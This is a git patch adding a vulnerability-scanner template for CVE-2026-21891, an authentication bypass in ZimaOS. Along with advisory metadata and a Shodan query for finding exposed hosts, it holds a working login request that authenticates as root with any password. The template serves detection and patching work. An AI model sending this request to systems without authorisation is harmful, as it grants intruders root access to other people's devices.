From 95377a901a76281f8ecaa3db3e3637061fd123ed Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Thu, 12 Feb 2026 14:09:05 +0530
Subject: [PATCH] Create CVE-2026-21891.yaml for ZimaOS auth bypass

---
 http/cves/2026/CVE-2026-21891.yaml | 64 ++++++++++++++++++++++++++++++
 1 file changed, 64 insertions(+)
 create mode 100644 http/cves/2026/CVE-2026-21891.yaml

diff --git a/http/cves/2026/CVE-2026-21891.yaml b/http/cves/2026/CVE-2026-21891.yaml
new file mode 100644
index 000000000000..5dbe16cea213
--- /dev/null
+++ b/http/cves/2026/CVE-2026-21891.yaml
@@ -0,0 +1,64 @@
+id: CVE-2026-21891
+
+info:
+  name: ZimaOS - Authentication Bypass
+  author: DhiyaneshDk
+  severity: critical
+  description: |
+    ZimaOS <= 1.5.0 contains a broken authentication caused by improper password validation for known system service accounts in the login function, letting attackers authenticate with any password for these accounts, exploit requires knowledge of common usernames.
+  impact: |
+    Attackers can gain authenticated access to system service accounts without valid passwords, potentially compromising the system.
+  remediation: |
+    Update to a fixed version when available or apply patches to properly validate passwords for system service accounts.
+  reference:
+    - https://github.com/IceWhaleTech/ZimaOS/security/advisories/GHSA-xj93-qw9p-jxq4
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-21891
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
+    cvss-score: 9.4
+    cve-id: CVE-2026-21891
+    cwe-id: CWE-287
+    epss-score: 0.00059
+    epss-percentile: 0.18386
+    cpe: cpe:2.3:o:zimaspace:zimaos:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: html:"ZimaOS"
+    product: zimaos
+    vendor: zimaspace
+  tags: cve,cve2026,zimaos,auth-bypass,broken-auth
+
+http:
+  - raw:
+      - |
+        POST /v1/users/login HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json, text/plain, */*
+        Content-Type: application/json
+        Origin: {{RootURL}}
+        Referer: {{RootURL}}/
+
+        {
+          "username": "root",
+          "password": "anything"
+        }
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "success"
+          - "username"
+          - "created_at"
+        condition: and
+
+      - type: word
+        part: content_type
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200